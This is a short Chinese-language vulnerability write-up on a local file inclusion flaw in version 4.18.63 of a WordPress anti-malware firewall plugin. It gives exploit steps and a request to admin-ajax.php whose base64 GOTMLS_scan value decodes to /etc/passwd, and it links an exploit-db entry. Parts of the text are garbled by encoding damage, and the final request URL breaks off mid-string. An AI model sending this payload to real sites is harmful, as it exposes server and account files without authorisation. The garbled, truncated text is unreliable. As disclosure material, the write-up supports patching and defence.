1、Wordpress插件本地文件包含漏洞
在Wordpress反惡意軟件和暴力破解防火墻(4.18.63版)插件上發(fā)現(xiàn)了一個本地文件包含錯誤。此漏洞會影響插件的文件掃描功能,任何經(jīng)過身份驗證的用戶(從訂閱用戶到管理員)都可以利用此漏洞,只需使用攻擊者嘗試讀取的文件的base64編碼路徑修改GOTMLS_scan=。(示例:GOTMLS_scan=L2V0Yy9wYXNzd2Q)
2、本地文件包含漏洞
本地文件包含允許攻擊者通過瀏覽器包含一個服務(wù)器上的文件。當(dāng)一個WEB應(yīng)用程序在沒有正確過濾輸入數(shù)據(jù)的情況下,就有可能存在這個漏洞,該漏洞允許攻擊者操縱輸入數(shù)據(jù)、注入路徑遍歷字符、包含web服務(wù)器的其他文件。linux下常見的是用文件包含漏洞讀取/etc/passwd文件從而獲取操作系統(tǒng)賬號
3、惡意PCAP分析
漏洞攻擊的步驟
步驟 1 -登錄Wordpress 站點?
步驟 2 - 訪問 /wordpress/wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=97g3Z9DyChmbA3Z8AkaWWUm2ZNAtZWNx&mt=5777565408.4774&GOTMLS_scan=<base64 encoded file path>&last_action=GOTMLS_scan&last_GOTMLS_mt=97g3Z9DyChmbA3Z8AkaWWUm2ZNAtZ

wp插件本地包含漏洞
【1】https://www.exploit-db.com/exploits/46618